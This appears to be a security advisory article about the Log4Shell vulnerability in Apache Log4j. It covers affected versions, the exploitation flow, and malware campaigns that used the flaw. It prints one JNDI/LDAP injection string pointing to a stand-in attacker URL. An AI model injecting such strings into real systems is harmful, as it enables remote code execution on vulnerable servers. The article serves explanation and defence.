Log4Shell Vulnerability

On December 10, 2021, an exploit for a critical vulnerability in the Apache Log4j Java-based logging platform was released publicly. Tracked as CVE-2021-44228 or Log4Shell, the vulnerability impacts Log4j versions from Log4j 2.0-beta9 and up to 2.14.1. Threat actors can take advantage of the exploit to establish unauthenticated remote access, execute code, deliver malware threats or collect information. The vulnerability is assigned a critical status as Log4j is widely used by enterprise applications and cloud services.

Log4Shell Technical Details

The exploit begins with the threat actor changing their Web browser's user agent. Then they visit a site or search for a specific string present on websites with the format:

${jndi:ldap://[attacker_URL]}

As a result, the string will be added to the Web server's access logs. The attackers then wait for the Log4j application to parse these logs and reach the appended string. In this instance, the bug will trigger, causing the server to make a callback to the URL present in the JNDI string. That URL is abused to handle Base64-encoded commands or Java classes subsequently and execute them on the compromised device.

Apache quickly released a new version - Log4j 2.15.0, to address and fix the exploit, but a significant amount of vulnerable systems could remain unpatched for a long period. At the same time, threat actors quickly took notice of the Log4Shell zero-day vulnerability and started scanning for suitable servers to exploit. The infosec community has tracked numerous attack campaigns employing Log4Shell to deliver a wide ranger of malware threats.

Log4Shell is Used in Cryptominer, Botnet, Backdoor and Data-Collecting Attacks

One of the first threat actors to implement Log4Shell in their operations were the cybercriminals behind the Kinsing crypto-mining botnet. The hackers used Log4Shell to deliver Base64-encoded payloads and run shell scripts. The role of these scripts is to clean the targeted system from competing crypto-mining threats before their own Kinsing malware is executed.

Netlab 360 detected threat actors using the vulnerability to install versions of the Mirai and Muhstik botnets on the breached devices. These malware threats are designed to add infected systems into a network of IoT devices and servers, which the attackers can then instruct to launch DDoS (Distributed Denial-of-Service) attacks or deploy crypto-miners subsequently.

According to the Microsoft Threat Intelligence Center, the Log4j exploit also was targeted by attack campaigns dropping Cobalt Strike beacons. Cobalt Strike is a legitimate software tool used for penetration testing against a company's security systems. However, its backdoor capabilities have made it a common part of the arsenal of numerous threat actor groups. Afterward, the illegal backdoor access to the victim's network is used to deliver next-stage payloads such as ransomware, info-stealers and other malware threats.

Log4Shell can be exploited to acquire environment variables containing server data. This way, attackers can get access to the host's name, the OS name, OS version number, user name under which the Log4j service is running and more.